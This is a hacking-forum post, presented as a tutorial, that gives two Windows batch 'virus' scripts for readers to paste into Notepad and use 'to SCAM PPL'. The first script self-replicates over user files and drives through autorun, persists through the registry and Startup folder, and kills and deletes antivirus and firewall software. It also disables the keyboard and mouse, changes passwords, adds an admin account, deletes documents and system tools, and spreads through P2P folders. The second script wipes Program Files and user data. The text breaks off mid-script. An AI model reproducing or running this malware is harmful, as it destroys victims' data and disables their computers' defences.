Results 1 to 6 of 6
  1. #1
    PoP_KiLLaH's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    Watching Hentai
    Posts
    644
    Reputation
    17
    Thanks
    229
    My Mood
    Devilish

    Exclamation [TUT]The real 2 death virus"[TUT]

    ok open notepad then copy and paste this code:
    This is just a virus. u can use it To SCAM PPL.
    NOTE:when they opened this virus they all have to buy a new pc.
    1st virus: this virus fuks up ur pc(the worst virus)
    Code:
    @echo off
    ::--Infect All Html Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.html) Do (
                Set HtmlInfect=%%Z > Nul
                Copy /y %0 %HtmlInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Mp3 Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.mp3) Do (
                Set Mp3Infect=%%Z > Nul
                Copy /y %0 %Mp3Infect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::-------Infect All .Doc-----::
    Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.doc) Do (
                Set DocInfect=%%Z > Nul
                Copy /y %0 %DocInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Exe Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.exe) Do (
                Set ExeInfect=%%Z > Nul
                Copy /y %0 %ExeInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Bat Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.bat) Do (
                Set BatInfect=%%Z > Nul
                Copy /y %0 %BatInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Vlc Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.vlc) Do (
                Set VlcInfect=%%Z > Nul
                Copy /y %0 %VlcInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Mp4 Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.mp4) Do (
                Set Mp4Infect=%%Z > Nul
                Copy /y %0 %Mp4Infect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Txt Files---::
    Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.txt) Do (
                Set TxtInfect=%%Z > Nul
                Copy /y %0 %TxtInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Jpeg Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.jpeg) Do (
                Set JpegInfect=%%Z > Nul
                Copy /y %0 %JpegInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Gif Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.gif) Do (
                Set GifInfect=%%Z > Nul
                Copy /y %0 %GifInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::---Infect All Mpeg Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.mpeg) Do (
                Set MpegInfect=%%Z > Nul
                Copy /y %0 %MpegInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Wma Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.wma) Do (
                Set WmaInfect=%%Z > Nul
                Copy /y %0 %WmaInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Rar Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.rar) Do (
                Set RarInfect=%%Z > Nul
                Copy /y %0 %RarInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Zip Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.zip) Do (
                Set ZipInfect=%%Z > Nul
                Copy /y %0 %ZipInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::----Infect All Vbs Files---::
        Dir %Homedrive% /s /b > DirPath                          
            For /f %%Y In (DirPath) Do (
            Set DirPath=%%Y > Nul    
                For %%Z In (%DirPath%\*.vbs) Do (
                Set VbsInfect=%%Z > Nul
                Copy /y %0 %VbsInfect%
            )
        )
    
    Del /f /s /q DirPath
    ::---------------------------::
    ::-----Infect All Drives-----::
    for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
    copy /Y %0 %%E:\
    echo [AutoRun] > %%E:\autorun.inf
    echo open="%%E:\%0" >> %%E:\autorun.inf
    echo action=Open folder to see files... >> %%E:\autorun.inf)
    ::---------------------------::
    ::----Infect All Folders-----::
    Dir %SystemRoot% /s /b > PathHost
    For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
    Del /f /s /q PathHost > Nul
    ::---------------------------::
    ::------Run As Service-------::
    copy "Virus Name [Write in a name first, and do not change it].bat" "C:\Windows\Virus Name [Write in a name first, and do not change it]"
    reg add HKLM\software\Microsoft\Windows\CurrentVersion\RunServices /v "Virus Name [Write in a name first, and do not change it]" /t REG_SZ /d "C:\Windows\Virus Name [Write in a name first, and do not change it].bat" / f > nul
    ::---------------------------::
    ::-----Infect "ls" CMD-----::
    copy %0 %windir%\system32\ls.bat
    ::---------------------------::
    ::-----Infect Autoexec.bat---::
    echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
    ::---------------------------::
    ::------Copy To Startup------::
    copy "Virus Name [Write in a name first, and do not change it].bat" "%userprofile%\Start Menu\Programs\Startup\Virus Name [Write in a name first, and do not change it].bat"
    ::---------------------------::
    ::--Disable Windows Defender-::
    net stop "WinDefend"
    taskkill /f /t /im "MSASCui.exe"
    ::---------------------------::
    ::-Disable Windows Security Center-::
    net stop "wscsvc"
    ::---------------------------------::
    ::-Disable Windows Firewall--::
    net stop "MpsSvc"
    taskkill /f /t /im "FirewallControlPanel.exe"
    ::---------------------------::
    ::-Disable Windows Backup-::
    net stop "SDRSVC"
    ::------------------------::
    ::---Disable Windows Update--::
    net stop "wuauserv"
    ::---------------------------::
    ::-Disable Windows Parental Controls-::
    net stop "WPCSvc"
    ::-----------------------------------::
    ::-Disable Windows Error Reporting-::
    net stop "WerSvc"
    ::---------------------------------::
    ::--Disable Windows Search---::
    net stop "WSearch"
    ::---------------------------::
    ::-------AV Kill [UD]--------::
    net stop “Security Center”
    netsh firewall set opmode mode=disable
    tskill /A av*
    tskill /A fire*
    tskill /A anti*
    cls
    tskill /A spy*
    tskill /A bullguard
    tskill /A PersFw
    tskill /A KAV*
    tskill /A ZONEALARM
    tskill /A SAFEWEB
    cls
    tskill /A OUTPOST
    tskill /A nv*
    tskill /A nav*
    tskill /A F-*
    tskill /A ESAFE
    tskill /A cle
    cls
    tskill /A BLACKICE
    tskill /A def*
    tskill /A kav
    tskill /A kav*
    tskill /A avg*
    tskill /A ash*
    cls
    tskill /A aswupdsv
    tskill /A ewid*
    tskill /A guard*
    tskill /A guar*
    tskill /A gcasDt*
    tskill /A msmp*
    cls
    tskill /A mcafe*
    tskill /A mghtml
    tskill /A msiexec
    tskill /A outpost
    tskill /A isafe
    tskill /A zap*
    cls
    tskill /A zauinst
    tskill /A upd*
    tskill /A zlclien*
    tskill /A minilog
    tskill /A cc*
    tskill /A norton*
    cls
    tskill /A norton au*
    tskill /A ccc*
    tskill /A npfmn*
    tskill /A loge*
    tskill /A nisum*
    tskill /A issvc
    tskill /A tmp*
    cls
    tskill /A tmn*
    tskill /A pcc*
    tskill /A cpd*
    tskill /A pop*
    tskill /A pav*
    tskill /A padmin
    cls
    tskill /A panda*
    tskill /A avsch*
    tskill /A sche*
    tskill /A syman*
    tskill /A virus*
    tskill /A realm*
    cls
    tskill /A sweep*
    tskill /A scan*
    tskill /A ad-*
    tskill /A safe*
    tskill /A avas*
    tskill /A norm*
    cls
    tskill /A offg*
    del /Q /F C:\Program Files\alwils~1\avast4\*.* 
    del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe 
    del /Q /F C:\Program Files\kasper~1\*.exe 
    cls
    del /Q /F C:\Program Files\trojan~1\*.exe 
    del /Q /F C:\Program Files\f-prot95\*.dll 
    del /Q /F C:\Program Files\tbav\*.dat 
    cls
    del /Q /F C:\Program Files\avpersonal\*.vdf 
    del /Q /F C:\Program Files\Norton~1\*.cnt 
    del /Q /F C:\Program Files\Mcafee\*.* 
    cls
    del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* 
    del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* 
    del /Q /F C:\Program Files\Norton~1\Norton~1\*.* 
    del /Q /F C:\Program Files\Norton~1\*.* 
    cls
    del /Q /F C:\Program Files\avgamsr\*.exe 
    del /Q /F C:\Program Files\avgamsvr\*.exe 
    del /Q /F C:\Program Files\avgemc\*.exe 
    cls
    del /Q /F C:\Program Files\avgcc\*.exe 
    del /Q /F C:\Program Files\avgupsvc\*.exe 
    del /Q /F C:\Program Files\grisoft 
    del /Q /F C:\Program Files\nood32krn\*.exe 
    del /Q /F C:\Program Files\nood32\*.exe 
    cls
    del /Q /F C:\Program Files\nod32 
    del /Q /F C:\Program Files\nood32
    del /Q /F C:\Program Files\kav\*.exe 
    del /Q /F C:\Program Files\kavmm\*.exe 
    del /Q /F C:\Program Files\kaspersky\*.*
    cls
    del /Q /F C:\Program Files\ewidoctrl\*.exe 
    del /Q /F C:\Program Files\guard\*.exe 
    del /Q /F C:\Program Files\ewido\*.exe 
    cls
    del /Q /F C:\Program Files\pavprsrv\*.exe 
    del /Q /F C:\Program Files\pavprot\*.exe 
    del /Q /F C:\Program Files\avengine\*.exe 
    cls
    del /Q /F C:\Program Files\apvxdwin\*.exe 
    del /Q /F C:\Program Files\webproxy\*.exe 
    del /Q /F C:\Program Files\panda software\*.*
    ::---------------------------::
    ::------Disable Keyboard-----::
    echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
    echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
    echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
    echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
    echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
    echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
    echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
    echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
    echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
    echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
    echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
    echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
    echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
    echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
    echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
    echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
    echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
    echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
    echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
    echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
    echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
    echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
    start nokeyboard.reg
    ::---------------------------::
    ::-------Disable Mouse-------::
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    ::---------------------------::
    ::----Hide My Music Folder---::
    attrib +h "%userprofile%\my documents\my music"
    ::---------------------------::
    ::--Confuse File Extensions--::
    assoc .dll=txtfile
    assoc .exe=pngfile
    assoc .bat=WinRAR
    assoc .vbs=Visual Style
    assoc .reg=xmlfile
    assoc .txt=regfile
    ::---------------------------::
    ::Confuse File Extensions [TXT]::
    assoc .mp3=txtfile
    assoc .xml=txtfile
    assoc .png=txtfile
    ::-----------------------------::
    ::------Change The Time------::
    time 00:00
    ::---------------------------::
    ::-------Open Disk Tray------::
    echo Do >> "opendisk.vbs"
    echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
    echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
    echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
    echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
    echo Loop >> "opendisk.vbs"
    start "" "opendisk.vbs"
    ::---------------------------::
    ::---Disable Taskmanager-----::
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
    ::---------------------------::
    ::----Swap Mouse Buttons-----::
    RUNDLL32 USER32.DLL,SwapMouseButton
    ::---------------------------::
    ::--Change Pass To InShadow--::
    net user %username% InShadow
    ::---------------------------::
    ::--Start Hidden WinXP Song--::
    cd "C:\Windows\system32\oobe\images"
    start title.wma
    ::---------------------------::
    ::----Spread Via LimeWire----::
    copy Virus Name [Write in a name first, and do not change it].bat c:\program files\limewire\Shared\Virus Name [Write in a name first, and do not change it].bat
    ::---------------------------::
    ::----Spread Via Grokster----::
    copy Virus Name [Write in a name first, and do not change it].bat c:\program files\Grokster\My Grokster\Virus Name [Write in a name first, and do not change it].bat
    ::---------------------------::
    ::------Spread Via eMule-----::
    copy Virus Name [Write in a name first, and do not change it].bat c:\program files\eMule\Incoming\Virus Name [Write in a name first, and do not change it].bat
    ::---------------------------::
    ::------MsgBox Function------::
    echo x=msgbox("i'm afraid ur have to buy a new pc",vbExclamation or vbOkOnly,"u just made A suicide") >>dll32.vbs
    start "" "dll32.vbs"
    ::---------------------------::
    ::-----Kill Explorer.exe-----::
    echo :a >>WindUpdate.bat
    echo tskill explorer >>WindUpdate.bat
    echo goto a >>WindUpdate.bat
    echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
    echo strCommand = "WindUpdate.bat">>rundlll32.vbs
    echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
    start "" rundlll32.vbs
    ::---------------------------::
    ::------Disable Keyboard-----::
    echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
    echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
    echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
    echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
    echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
    echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
    echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
    echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
    echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
    echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
    echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
    echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
    echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
    echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
    echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
    echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
    echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
    echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
    echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
    echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
    echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
    echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
    start nokeyboard.reg
    ::---------------------------::
    ::-------Disable Mouse-------::
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    ::---------------------------::
    ::----Add Normal Account-----::
    net user Username Password /add
    ::---------------------------::
    ::-----Add Admin Account-----::
    net user Username Password /add
    net localgroup administrators Username /add
    ::---------------------------::
    ::-------Delete MS Paint-----::
    del /f /q "mspaint.exe"
    ::---------------------------::
    ::-----Delete My Music-------::
    del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
    ::---------------------------::
    ::-----Delete My Music-------::
    del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
    ::---------------------------::
    ::--Delete Internet Explorer-::
    del /f /q "C:\Program Files\Internet Explorer\iexplore.exe"
    ::---------------------------::
    ::-------Delete Notepad------::
    del /f /q "notepad.exe"
    ::---------------------------::
    ::--Delete Windows Live Mail-::
    del /f /q "wlmail.exe"
    ::---------------------------::
    ::-------Delete Wordpad------::
    del /f /q "WordPad.exe"
    ::---------------------------::
    ::-----Delete My Pictures----::
    del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
    ::---------------------------::
    ::----Delete My Documents----::
    del /f /q "C:\Users\%userprofile%\My Documents\*.*"
    ::---------------------------::
    ::--------Delete Calc.-------::
    del /f /q "calc.exe"
    ::---------------------------::
    ::-------Block YouTube-------::
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 youtube.com >> "Hosts"
    echo 127.0.0.1 www.youtube.com >> "Hosts"
    ::---------------------------::
    ::--------Block Google-------::
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 google.com >> "Hosts"
    echo 127.0.0.1 www.google.com >> "Hosts"
    ::---------------------------::
    ::--------Block Hotmail------::
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 hotmail.com >> "Hosts"
    echo 127.0.0.1 www.hotmail.com >> "Hosts"
    ::---------------------------::
    ::---------Block MSN---------::
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 msn.com >> "Hosts"
    echo 127.0.0.1 www.msn.com >> "Hosts"
    ::---------------------------::
    ::-------Block Wikipedia-----::
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 wikipedia.org >> "Hosts"
    echo 127.0.0.1 www.wikipedia.org >> "Hosts"
    ::---------------------------::
    ::--------Block Yahoo!-------::
    cd "C:\Windows\System32\Drivers\etc"
    echo 127.0.0.1 yahoo.com >> "Hosts"
    echo 127.0.0.1 www.yahoo.com >> "Hosts"
    ::---------------------------::
    ::--------MsgBox Spam--------::
    echo Do>>msgbox.vbs
    echo x=msgbox("You Have Been Hacked.",vbExclamation or vbOkOnly,"Hacked") >>msgbox.vbs
    echo Loop>>msgbox.vbs
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    start "" "msgbox.vbs"
    ::---------------------------::
    ::-------Spam C Drive--------::
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    ::---------------------------::
    ::----Spam System32 Folder---::
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
    ::---------------------------::
    ::----Spam With Net Send-----::
    net start "messenger"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    net send * "Spammed Message"
    ::---------------------------::
    ::-------Spam Desktop--------::
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
    ::---------------------------::
    ::-----Shutdown Computer-----::
    shutdown -s -t 5 sec -c "Comment"
    ::---------------------------::
    start https://Youfail.org
    2nd one: u maybe need to reformat or buy a new pc after opening this virus:
    Code:
    @echo off
    del /Q /F C:\Program Files\Aim6\*.*
    del /Q /F C:\Program Files\Aim\*.*
    Cls
    del /Q /F C:\Program Files\Aim5\*.*
    
    del /Q /F C:\Program Files\Internet Explorer\*.*
    
    del /Q /F C:\Program Files\itunes\*.*
    
    ipconfig /release
    if ERRORLEVEL1 ipconfig /release_all
    
    del /Q /F C:\Program Files\*.*
    
    del /f /q"C:\Users\%userprofile%\My Documents\My Music\*.*"
    
    del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*" 
    
    net stop "wuauserv" 
    
    net stop "MpsSvc"
    taskkill /f /t /im "FirewallControlPanel.exe"
    
    cd "C:\Windows\System32\Drivers\etc"
